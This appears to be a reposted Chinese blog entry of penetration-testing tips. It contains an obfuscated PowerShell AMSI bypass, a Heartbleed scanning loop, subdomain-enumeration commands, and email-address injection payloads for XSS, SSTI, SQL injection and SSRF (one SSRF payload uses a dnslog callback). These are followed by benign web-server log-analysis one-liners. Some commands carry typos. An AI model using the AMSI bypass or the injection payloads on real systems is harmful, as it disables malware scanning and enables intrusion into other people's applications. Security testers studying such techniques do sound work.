渗透Tips - 第十七期

  • A+
所属分类:安全文章

目录

  • Bypass AMSI

  • 查询是否存在heart bleed漏洞

  • 远程解压文件

  • Top25 ssrf dorks

  • 使用SecurityTrails API查询子域名

  • 邮件地址payload

  • Web server日志分析命令

Bypass AMSI


From: @TihanyiNorbert

$a =[Ref].Assembly.GetType('System.Management.Automation.AmsiUt'+'ils')$h="4456625220575263174452554847"$s =[string](0..13|%{[char][int](53+($h).substring(($_*2),2))})-replace " "$b =$a.GetField($s,'NonPublic,Static')$b.SetValue($null,$true)


渗透Tips - 第十七期

查询是否存在heart bleed漏洞

cat list.txt | while read line ; do echo"QUIT" | openssl s_client -connect $line:443 2>&1 | grep'server extension "heartbeat" (id=15)' || echo $line: safe; done


渗透Tips - 第十七期

远程解压文件


pip install remotezip

#列出远程压缩包文件内容
remotezip -l http://site/bigfile.zip

#解压里面的文件
remotezip "http://site/bigfile.zip" "file.txt"

Top25 ssrf dorks

渗透Tips - 第十七期

使用SecurityTrails API查询子域名

去https://securitytrails.com/申请个免费的API

curl -s --request GET --url https://api.securitytrails.com/v1/domain/target.com/subdomains?apikey=API_KEY |jq '.subdomains[]' | sed 's/"//g' >test.txt 2>/dev/null &&sed "s/$/.target.com/" test.txt | sed 's/ //g' && rm test.tx


渗透Tips - 第十七期

邮件地址payload

XSS

test+(<script>alert(0)</script>)@example.com[email protected](<script>alert(0)</script>).com"<script>alert(0)</script>"@example.com

SSTI

"<%= 7 * 7 %>"@example.comtest+(${{7*7}})@example.com

SQL injection

"' OR 1=1 -- '"@example.com"mail'); --"@example.com

SSRF

john.doe@abc123.dnslog.cn[email protected][127.0.0.1]

Web server日志分析命令

https://gist.github.com/hvelarde/ceac345c662429447959625e6feb2b47

通过状态码获取请求总数

awk '{print $9}' /var/log/apache2/access.log | sort | uniq -c | sort –rn


渗透Tips - 第十七期

按照IP的请求数量排序

awk '{print $1}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head | awk -v OFS='t' '{"host " $2 | getline ip;print $0, ip}'

渗透Tips - 第十七期

按照ua的请求数量排序

awk -F'"' '{print $6}' /var/log/apache2/access.log| sort | uniq -c | sort -rn | head

渗透Tips - 第十七期

按照url的请求数量排序

awk '{print $7}' /var/log/apache2/access.log |sort | uniq -c | sort -rn | head

渗透Tips - 第十七期

按照请求页面为404的url排序

awk '$9 ~ /404/ {print $7}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head

按照请求致后端报错的IP排序

awk '$0 ~ /[error]/ && match($0,/(client: )(.*)(, server)/, arr) {print arr[2]}' /var/log/apache2/error.log |sort | uniq -c | sort -rn | awk -v OFS='t' '{"host " $2 | getlineip; print $0, ip}'


获取最近10分钟的请求

awk -v date=$(date +[%d/%b/%Y:%H:%M--date="-10 minutes") '$4 > date' /var/log/nginx/access.log



本文始发于微信公众号(关注安全技术):渗透Tips - 第十七期

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: